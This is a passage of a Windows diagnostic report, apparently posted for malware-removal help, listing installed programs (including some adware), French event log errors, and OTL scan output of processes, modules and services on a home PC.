de photos"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater"{4A37A114-702F-4055-A4B6-16571D4A5353}" = AOP Framework"{551AC8F2-FEA2-4B45-ACF7-C98681233CC9}" = Nero BackItUp 12 Essentials OEM.a01

"{59307833-CB98-4440-B644-0CD352F61907}" = Windows Live PIMT Platform"{59435E52-9E4D-4994-9E5F-7B5A681C117E}" = Windows Live Messenger"{5A88AF74-251F-4CE1-A9C4-5A627D10AE16}" = Movie Maker"{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}" = Realtek Card Reader"{5CDF2354-26AF-2DBC-1012-44FEDFCC75BB}" = websaveRR"{65153EA5-8B6E-43B6-857B-C6E4FC25798A}" = Intel(R) Management Engine Components"{65BB0407-4CC8-4DC7-952E-3EEFDF05602A}" = Nero Update"{6AFCA4E1-9B78-3640-8F72-A7BF33448200}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729"{6D2BBE1D-E600-4695-BA37-0B0E605542CC}" = Office Addin"{6F6873E3-5C92-4049-B511-231A138DD090}" = Kaspersky Internet Security"{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-acer" = WildTangent Games App"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable"{72D9236D-C6EA-4DA6-A18C-CC24521A70D4}" = Windows Live Mail"{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}" = Skype™ 6.18"{7C0791D9-F1FB-48DD-B8E4-662BDAE42357}" = Windows Live Messenger"{80E311AD-3A9C-45C7-A403-8FF3F7609764}" = Windows Live Writer"{8C22A294-DBBA-445F-B55C-E26817CCFE69}" = Movie Maker"{8D5D54B8-3D29-4AB4-8DA8-1868DAF941D8}" = OpenOffice 4.0.1"{8DD46C6A-0056-4FEC-B70A-28BB16A1F11F}" = MSVCRT"{8E14DDC8-EA60-4E18-B3E3-1937104D5BDA}" = MSVCRT110"{8F66BFDE-B213-48E2-93EF-7151277A2916}" = Windows Live SOXE Definitions"{8FB53850-246A-3507-8ADE-0060093FFEA6}" = Visual Studio Tools for the Office system 3.0 Runtime"{90150000-0138-0409-0000-0000000FF1CE}" = Microsoft Office"{91589413-6675-4C27-8AFC-EFB9103B90A5}" = eBay Worldwide"{94532CD5-C66D-49E3-9131-5FB04D7647A1}" = Windows Live UX Platform"{9797D7BA-A333-4DF1-AF55-AC745D216EDB}" = Windows Live Writer"{983FA94A-A7DD-40B1-B7F9-F45D2B4FD1DE}" = Windows Live Photo Common"{99E82553-9654-4FB7-8DB3-900C0FDB1A70}" = Windows Live Writer Resources"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161"{A2D43081-CF7B-4637-A9F3-E2651AA5C4A8}" = Nero RescueAgent"{A2F4B74E-D722-4D9E-817B-F58F32A55A51}" = Windows Live UX Platform Language Pack"{A59A15E8-2B9B-490D-916E-D608A9D0D295}" = Windows Live Writer"{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}" = Acer Portal"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper"{A9FFEC6C-9C44-4597-8E23-EDD78BF5D0B2}" = Windows Live Communications Platform"{ABC88553-8770-4B97-B43E-5A90647A5B63}" = Nero ControlCenter"{B46BEA36-0B71-4A4E-AE41-87241643FA0A}" = CyberLink PowerDVD 12"{B5AD89F2-03D3-4206-8487-018298007DD0}" = Acer Photo"{BB1CD1CB-29E8-4FE4-A2E6-72F87DF214E3}" = Photo Common"{BD6AB01A-87D5-D11C-6783-4980E108D049}" = FOrmiattsConVerte"{BEBEE34D-84A2-4EDD-8BEA-96CC54371263}" = Nero Core Components"{C201BDF9-1C27-46F8-A248-F4469C9FC27C}" = Photo Common"{C87DF7BB-4F5C-4BBE-B041-A59FFF4A1D07}" = Windows Live SOXE"{C95AEB53-7FAE-4257-97AF-7136E8D9F9CA}" = Movie Maker"{C994C746-C6D0-4EBA-B09E-DF7B18381B69}" = Nero ControlCenter Help (CHM)"{CA4FE8B0-298C-4E5D-A486-F33B126D6A0A}" = abDocs

"{CC0FA843-D991-4D3F-BA09-773B10A0F682}" = Windows Live UX Platform Language Pack"{D0B44725-3666-492D-BEF6-587A14BD9BD9}" = MSVCRT_amd64"{DA2D3078-A58C-45E8-8EE0-18B8BE6B34F7}" = Nero BackItUp"{DCBF3379-246B-47E1-8173-639B63940838}" = Acer Docs Office AddIn"{DD3F9A4A-D424-404C-9B70-937E1093926F}" = Windows Live Writer Resources"{DF7DC45D-8A3C-490C-A70F-8C6A6189EDF9}" = Photo Gallery"{E09C4DB7-630C-4F06-A631-8EA7239923AF}" = D3DX10"{E5C0539E-74AA-41D1-A974-5D44FB58BE6E}" = Windows Live Writer"{E5E83E00-1144-4821-B6B6-7A16C41EFC39}" = Windows Live Messenger"{E625FCA0-E43E-4D3B-92FF-4851308A0366}" = Norton Online Backup"{E9AF1707-3F3A-49E2-8345-4F2D629D0876}" = Acer Media"{EE26E302-876A-48D9-9058-3129E5B99999}" = Live Updater"{EF0D1292-8FC1-41BE-9740-DBC134F66415}" = Nero BackItUp Help (CHM)"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219"{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}" = Intel(R) Processor Graphics"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver"{FCEDADE3-1C8A-4858-BE93-360168178BB2}" = Windows Live Essentials"{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}" = Microsoft Visual C++ 2008 Redistributable -x86 9.0.21022"Adobe Flash Player Plugin" = Adobe Flash Player 14 Plugin"FileZilla Client" = FileZilla Client 3.8.1"Google Chrome" = Google Chrome"InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}" = CyberLink PowerDVD 12"InstallWIX_{6F6873E3-5C92-4049-B511-231A138DD090}" = Kaspersky Internet Security"Microsoft Visual Studio 2005 Tools for Office Runtime" = Visual Studio 2005 Tools for Office Second Edition Runtime"Mozilla Firefox 31.0 (x86 fr)" = Mozilla Firefox 31.0 (x86 fr)"MozillaMaintenanceService" = Mozilla Maintenance Service"mysearchdial" = Mysearchdial"NARA" = Norton Online Backup"Notepad++" = Notepad++"Optimizer Pro_is1" = Optimizer Pro v3.2"PhotoScape" = PhotoScape"SearchProtect" = Search Protect"Service photo Interdiscount" = Service photo Interdiscount"Settings Manager" = Settings Manager"Spotify" = Spotify"VideoPad" = VideoPad - Logiciel de montage vidéo"Visual Studio Tools for the Office system 3.0 Runtime" = Visual Studio Tools for the Office system 3.0 Runtime"WildTangent wildgames Master Uninstall" = WildTangent Games"WildTangentGameProvider-acer-genres" = Canaux de jeu"WildTangentGameProvider-acer-main" = Canaux de jeu"WinLiveSuite" = Windows Live Essentials"WTA-0496089d-654d-4262-872e-442120e31eb1" = Luxor Evolved"WTA-1631a50c-4542-4fcc-9dd1-5b0e82b42939" = Peggle Nights"WTA-27879a58-171d-4a55-a4c1-f50793c1b058" = Cradle Of Egypt Collector's Edition"WTA-2c4b5f01-4d64-45ec-b97d-a9be028ce135" = Trinklit Supreme"WTA-2e21b782-8fce-4896-b389-7565cfbed681" = Aloha TriPeaks

"WTA-bc1bca0c-4c50-40b9-bc14-492fdcc62f61" = Governor of Poker 2 Premium Edition"WTA-c42ee163-b604-447e-8518-207e91a5ab20" = Magic Academy"WTA-d61a273e-bd62-42aa-9aca-01c73db71403" = Plants vs. Zombies - Game of the Year"WTA-fcba52bb-43a3-4ae5-bbbb-405ce447482e" = The Chronicles of Emerland Solitaire"xampp" = XAMPP"ZHPDiag_is1" = ZHPDiag 2014 [color=#E56717]========== HKEY_USERS Uninstall List ==========[/color] [HKEY_USERS\S-1-5-21-3400277602-2072296053-2501058191-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]"Linkey" = Linkey"OneDriveSetup.exe" = Microsoft OneDrive"Pokki" = Host App Service"Pokki_03d432a7e610c3e908213e7689d4342ce2111caf" = Acer Games"ValueApps" = ValueApps [color=#E56717]========== Last 20 Event Log Errors ==========[/color] [ Application Events ]Error - 03.09.2014 13:00:00 | Computer Name = pc-maison | Source = ESENT | ID = 476Description = svchost (1296) SRUJet: La lecture de pages de base de données à partir du fichier « C:\Windows\system32\SRU\SRUDB.dat » à l’adresse relative 8192 (0x0000000000002000) (page de base de données 1 (0x1)) de 4096 (0x00001000) octets a échoué à la vérification à cause de l’absence de données de page. L’opération de lecture échouera en indiquant l’erreur -1019 (0xfffffc05). Si le problème persiste, restaurez la base de données à partir d’une version de sauvegarde antérieure. Ce problème est probablement dû à un matériel défectueux. Contactez votre fournisseur de matériel afin d’obtenir une assistance complémentaire pour diagnostiquer le problème. Error - 03.09.2014 13:00:00 | Computer Name = pc-maison | Source = ESENT | ID = 470Description = svchost (1296) SRUJet: La base de données C:\Windows\system32\SRU\SRUDB.dat est partiellement jointe. Phase d'insertion en pièce jointe : 3. Erreur : -1019. Error - 03.09.2014 13:02:13 | Computer Name = pc-maison | Source = Microsoft-Windows-Immersive-Shell | ID = 5973Description = Échec de l’activation de l’application microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 avec l’erreur : -2147024891 Pour plus d’informations, voir le journal Microsoft-Windows-TWinUI/Opérationnel. Error - 03.09.2014 13:02:13 | Computer Name = pc-maison | Source = Microsoft-Windows-Immersive-Shell | ID = 5973Description = Échec de l’activation de l’application Microsoft.SkypeApp_kzf8qxf38zg5c!App avec l’erreur : -2147024891 Pour plus d’informations, voir le journal Microsoft-Windows-TWinUI/Opérationnel. Error - 03.09.2014 13:12:01 | Computer Name = pc-maison | Source = Application Hang | ID = 1002Description = Le programme wwahost.exe version 6.3.9600.17031 a cessé d’interagir

avec Windows et a été fermé. Pour déterminer si des informations supplémentaires sont disponibles, consultez l’historique du problème dans le Centre de maintenance.

ID de processus : 11b4 Heure de début : 01cfc79973f7f71c Heure de fin : 4294967295 Chemin d’accès de l’application : C:\Windows\syswow64\wwahost.exe ID de rapport : 69263ac1-338d-11e4-826a-0c54a5fe0481

Nom complet du package défaillant : Microsoft.SkypeApp_3.1.0.1005_x86__kzf8qxf38zg5c

ID de l’application relative au package défaillant : App Error - 03.09.2014 13:15:46 | Computer Name = pc-maison | Source = ESENT | ID = 494Description = svchost (1292) SRUJet: La récupération de la base de données a échoué en indiquant l’erreur -1216, car elle a rencontré des références à une base de données, ’C:\Windows\system32\SRU\SRUDB.dat’, qui n’est plus présente. Cette dernière n’a pas été amenée à un état d’arrêt correct avant d’être supprimée (ou éventuellement déplacée ou renommée). Le moteur de base de données n’autorisera pas l’achèvement de la récupération pour cette instance aussi longtemps que la base de données manquante n’est pas réactivée. Si la base de données n’est réellement plus disponible et n’est plus nécessaire, des procédures de récupération suite à cette erreur sont proposées dans la Base de connaissances Microsoft ou par le lien « pour plus d’informations » en bas de ce message. Error - 03.09.2014 13:15:46 | Computer Name = pc-maison | Source = ESENT | ID = 454Description = svchost (1292) SRUJet: La récupération/restauration de la base de données a échoué avec l'erreur inattendue -1216. Error - 03.09.2014 13:38:06 | Computer Name = pc-maison | Source = Microsoft-Windows-Immersive-Shell | ID = 2486Description = L’application FileManager_6.3.9600.16384_neutral_neutral_cw5n1h2txyewy+Microsoft.Windows.PhotoManager n’a pas été lancée dans le délai qui lui était imparti. Error - 03.09.2014 13:38:10 | Computer Name = pc-maison | Source = Application Hang | ID = 1002Description = Le programme PhotosApp.exe version 6.3.9600.17122 a cessé d’interagir avec Windows et a été fermé. Pour déterminer si des informations supplémentaires sont disponibles, consultez l’historique du problème dans le Centre de maintenance.

ID de processus : 1410 Heure de début : 01cfc79dc8c99581 Heure de fin : 4294967295 Chemin d’accès de l’application : C:\Windows\FileManager\PhotosApp.exe ID de rapport : 11326b80-3391-11e4-826a-0c54a5fe0481 Nom complet du package défaillant : FileManager_6.3.9600.16384_neutral_neutral_cw5n1h2txyewy

ID de l’application relative au package défaillant : Microsoft.Windows.PhotoManager

Error - 03.09.2014 13:38:10 | Computer Name = pc-maison | Source = Microsoft-Windows-Immersive-Shell | ID = 5973Description = Échec de l’activation de l’application FileManager_cw5n1h2txyewy!Microsoft.Windows.PhotoManager avec l’erreur : -2144927142 Pour plus d’informations, voir le journal Microsoft-Windows-TWinUI/Opérationnel. [ System Events ]Error - 26.06.2014 13:14:00 | Computer Name = pc-maison | Source = Service Control Manager | ID = 7011Description = Le dépassement de délai (30000 millisecondes) a été atteint lors de l’attente de la réponse transactionnelle du service Browser. Error - 26.06.2014 13:14:00 | Computer Name = pc-maison | Source = Service Control Manager | ID = 7000Description = Le service Explorateur d’ordinateurs n’a pas pu démarrer en raison de l’erreur : %%1053 Error - 26.06.2014 13:17:12 | Computer Name = pc-maison | Source = Service Control Manager | ID = 7022Description = Le service Intel(R) Management and Security Application Local Management Service est en attente de démarrage. Error - 28.06.2014 13:04:59 | Computer Name = pc-maison | Source = BTHUSB | ID = 327697Description = La carte locale Bluetooth a échoué d'une manière indéterminée et ne sera pas utilisée. Le pilote a été déchargée. Error - 16.07.2014 08:46:37 | Computer Name = pc-maison | Source = BTHUSB | ID = 327697Description = La carte locale Bluetooth a échoué d'une manière indéterminée et ne sera pas utilisée. Le pilote a été déchargée. Error - 16.07.2014 08:47:05 | Computer Name = pc-maison | Source = BTHUSB | ID = 327697Description = La carte locale Bluetooth a échoué d'une manière indéterminée et ne sera pas utilisée. Le pilote a été déchargée. Error - 20.07.2014 15:51:57 | Computer Name = pc-maison | Source = DCOM | ID = 10010Description = Error - 24.07.2014 12:54:58 | Computer Name = pc-maison | Source = BTHUSB | ID = 327697Description = La carte locale Bluetooth a échoué d'une manière indéterminée et ne sera pas utilisée. Le pilote a été déchargée. Error - 27.07.2014 13:42:59 | Computer Name = pc-maison | Source = DCOM | ID = 10010Description = Error - 05.08.2014 07:39:15 | Computer Name = pc-maison | Source = BTHUSB | ID = 327697Description = La carte locale Bluetooth a échoué d'une manière indéterminée et ne sera pas utilisée. Le pilote a été déchargée. < End of report >

rapport OTLtxtOTL logfile created on: 09.09.2014 17:23:31 - Run 1OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Muller\Downloads64bit- An unknown product (Version = 6.2.9200) - Type = NTWorkstationInternet Explorer (Version = 9.11.9600.17239)Locale: 0000100C | Country: Suisse | Language: FRS | Date Format: dd.MM.yyyy 7,88 Gb Total Physical Memory | 6,25 Gb Available Physical Memory | 79,26% Memory free9,13 Gb Paging File | 7,23 Gb Available in Paging File | 79,20% Paging File freePaging file location(s): ?:\pagefile.sys [binary data] %SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)Drive C: | 912,70 Gb Total Space | 666,95 Gb Free Space | 73,07% Space Free | Partition Type: NTFS Computer Name: PC-MAISON | User Name: Muller | Logged in as Administrator.Boot Mode: Normal | Scan Mode: All users | Include 64bit ScansCompany Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days [color=#E56717]========== Processes (SafeList) ==========[/color] PRC - [2014.09.09 17:17:51 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Muller\Downloads\OTL.exePRC - [2014.06.26 21:49:04 | 000,053,504 | ---- | M] (Acer Incorporated) -- C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exePRC - [2014.06.26 21:48:30 | 003,053,312 | ---- | M] (Acer Incorporated) -- C:\Program Files (x86)\Acer\AOP Framework\CCDMonitorService.exePRC - [2014.04.24 23:04:16 | 000,227,904 | ---- | M] (WildTangent) -- C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exePRC - [2014.03.20 20:05:23 | 001,004,864 | ---- | M] (Kaspersky Lab ZAO) -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avpui.exePRC - [2014.01.28 17:13:52 | 001,177,592 | ---- | M] (PC Utilities Software Limited) -- C:\Program Files (x86)\Optimizer Pro\OptProReminder.exePRC - [2013.10.12 07:19:52 | 000,214,512 | ---- | M] (Kaspersky Lab ZAO) -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avp.exePRC - [2013.09.04 01:53:48 | 000,390,616 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exePRC - [2013.09.04 01:53:42 | 000,169,432 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exePRC - [2013.06.17 13:35:20 | 000,138,944 | ---- | M] (Kaspersky Lab ZAO) -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\klwtblfs.exePRC - [2012.07.14 01:27:00 | 000,769,432 | ---- | M] (Nero AG) -- C:\Program Files (x86)\Nero\Update\NASvc.exe [color=#E56717]========== Modules (No Company Name) ==========[/color] MOD - [2014.09.05 20:00:14 | 000,015,616 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\MyService\1.0.0.1__2dfa3f50f0bed57d\MyService.dllMOD - [2014.08.16 22:28:24 | 011,926,016 | ---- | M] () --

C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Web\b62668ee8bbecf0191aa16cc431aaf70\System.Web.ni.dllMOD - [2014.08.15 20:45:41 | 000,978,432 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\27dc8e491e32361eaff0b88f0befc197\System.Configuration.ni.dllMOD - [2014.08.15 20:44:00 | 005,467,136 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\8006a5df62f0c127d15db16d3a8c68f8\System.Xml.ni.dllMOD - [2014.08.15 20:43:57 | 012,436,480 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\6ec0cbaebf2932db68d8cc77b5e9b4e9\System.Windows.Forms.ni.dllMOD - [2014.08.15 20:43:52 | 001,593,344 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\f6ff4eab6e6bb587d62c3975fcbbca30\System.Drawing.ni.dllMOD - [2014.08.15 20:43:29 | 007,993,856 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System\a500ec9c4638c6ba200d7b55324709f2\System.ni.dllMOD - [2014.08.15 20:43:24 | 011,500,032 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\5bd3374f05d46ba0563f44d032209f08\mscorlib.ni.dllMOD - [2014.07.24 18:43:56 | 000,279,296 | ---- | M] () -- C:\Program Files (x86)\Acer\AcerCloud Docs\libcurl.dllMOD - [2014.06.26 21:49:08 | 000,013,568 | ---- | M] () -- C:\Program Files (x86)\Acer\AOP Framework\ServiceInterface.dllMOD - [2014.05.11 21:46:06 | 007,802,880 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7\System.Xml.ni.dllMOD - [2014.05.11 21:46:01 | 001,874,432 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4\System.Xaml.ni.dllMOD - [2014.05.11 21:45:48 | 019,566,080 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742\System.ServiceModel.ni.dllMOD - [2014.05.11 21:45:16 | 000,968,192 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778\System.Configuration.ni.dllMOD - [2014.05.11 21:45:15 | 000,463,360 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e\PresentationFramework.Aero2.ni.dllMOD - [2014.05.11 21:45:12 | 018,744,320 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565\PresentationFramework.ni.dllMOD - [2014.05.11 21:44:55 | 011,027,456 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c\PresentationCore.ni.dllMOD - [2014.05.11 21:44:46 | 003,957,760 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854\WindowsBase.ni.dllMOD - [2014.05.11 21:44:40 | 006,951,424 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30\System.Core.ni.dllMOD - [2014.05.11 21:44:34 | 010,003,456 | ---- | M] () --

C:\Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721\System.ni.dllMOD - [2014.01.27 13:52:41 | 017,395,376 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61\mscorlib.ni.dllMOD - [2013.12.29 01:03:37 | 000,212,992 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\System.resources\2.0.0.0_fr_b77a5c561934e089\System.resources.dllMOD - [2013.12.29 01:03:35 | 000,311,296 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_fr_b77a5c561934e089\mscorlib.resources.dllMOD - [2013.06.17 13:35:10 | 000,478,400 | ---- | M] () -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\dblite.dll [color=#E56717]========== Services (SafeList) ==========[/color] SRV:[b]64bit:[/b] - [2014.08.13 19:28:34 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)SRV:[b]64bit:[/b] - [2014.05.09 21:55:36 | 000,269,824 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\bisrv.dll -- (BrokerInfrastructure)SRV:[b]64bit:[/b] - [2014.05.09 21:54:50 | 000,530,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppReadiness.dll -- (AppReadiness)SRV:[b]64bit:[/b] - [2014.04.06 13:20:36 | 000,201,216 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)SRV:[b]64bit:[/b] - [2014.04.03 04:51:48 | 001,584,128 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\workfolderssvc.dll -- (workfolderssvc)SRV:[b]64bit:[/b] - [2014.03.24 04:31:14 | 000,347,880 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\NisSrv.exe -- (WdNisSvc)SRV:[b]64bit:[/b] - [2014.03.24 04:31:14 | 000,023,824 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)SRV:[b]64bit:[/b] - [2014.03.14 08:26:25 | 000,491,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\GeofenceMonitorService.dll -- (lfsvc)SRV:[b]64bit:[/b] - [2014.03.08 07:41:25 | 001,306,624 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppXDeploymentServer.dll -- (AppXSvc)SRV:[b]64bit:[/b] - [2014.03.06 09:02:13 | 000,834,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netlogon.dll -- (Netlogon)SRV:[b]64bit:[/b] - [2014.02.22 17:53:10 | 003,394,384 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\WSService.dll -- (WSService)SRV:[b]64bit:[/b] - [2014.02.22 11:57:16 | 000,710,656 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsm.dll -- (LSM)SRV:[b]64bit:[/b] - [2014.02.22 11:26:58 | 000,366,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wcmsvc.dll -- (Wcmsvc)SRV:[b]64bit:[/b] - [2014.02.22 11:25:39 | 000,399,872 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\das.dll -- (DeviceAssociationService)SRV:[b]64bit:[/b] - [2014.02.22 11:23:58 | 001,576,960 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wlidsvc.dll -- (wlidsvc)SRV:[b]64bit:[/b] - [2013.11.23 06:50:00 | 000,282,112 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\SystemEventsBrokerServer.dll -- (SystemEventsBroker)SRV:[b]64bit:[/b] - [2013.10.02 03:31:06 | 000,101,192 | ---- | M] (ELAN Microelectronics Corp.) [Auto | Running] -- C:\Program Files\Elantech\ETDService.exe -- (ETDService)SRV:[b]64bit:[/b] - [2013.08.22 14:31:56 | 002,899,968 | ---- | M] (Microsoft Corporation)

[On_Demand | Stopped] -- C:\Windows\SysNative\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)SRV:[b]64bit:[/b] - [2013.08.22 13:32:02 | 000,024,576 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wephostsvc.dll -- (WEPHOSTSVC)SRV:[b]64bit:[/b] - [2013.08.22 13:31:43 | 000,040,448 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\efssvc.dll -- (EFS)SRV:[b]64bit:[/b] - [2013.08.22 13:22:45 | 000,066,048 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wiarpc.dll -- (WiaRpc)SRV:[b]64bit:[/b] - [2013.08.22 13:21:15 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\svsvc.dll -- (svsvc)SRV:[b]64bit:[/b] - [2013.08.22 13:16:57 | 000,118,272 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\fhsvc.dll -- (fhsvc)SRV:[b]64bit:[/b] - [2013.08.22 13:03:41 | 000,052,736 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rundll32.exe -- (70e6ca8c)SRV:[b]64bit:[/b] - [2013.08.22 12:25:28 | 000,164,352 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcaSvc.dll -- (NcaSvc)SRV:[b]64bit:[/b] - [2013.08.22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicvss)SRV:[b]64bit:[/b] - [2013.08.22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmictimesync)SRV:[b]64bit:[/b] - [2013.08.22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicshutdown)SRV:[b]64bit:[/b] - [2013.08.22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicrdv)SRV:[b]64bit:[/b] - [2013.08.22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmickvpexchange)SRV:[b]64bit:[/b] - [2013.08.22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicheartbeat)SRV:[b]64bit:[/b] - [2013.08.22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicguestinterface)SRV:[b]64bit:[/b] - [2013.08.22 12:02:47 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\smphost.dll -- (smphost)SRV:[b]64bit:[/b] - [2013.08.22 11:57:25 | 000,130,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ScDeviceEnum.dll -- (ScDeviceEnum)SRV:[b]64bit:[/b] - [2013.08.22 11:54:59 | 000,059,392 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)SRV:[b]64bit:[/b] - [2013.08.22 11:50:59 | 000,245,760 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\TimeBrokerServer.dll -- (TimeBroker)SRV:[b]64bit:[/b] - [2013.08.22 11:50:00 | 000,525,312 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)SRV:[b]64bit:[/b] - [2013.08.22 11:45:59 | 000,151,040 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\ncbservice.dll -- (NcbService)SRV:[b]64bit:[/b] - [2013.08.22 11:40:49 | 000,248,832 | ---- | M] (Microsoft Corporation) [On_Demand | Running] 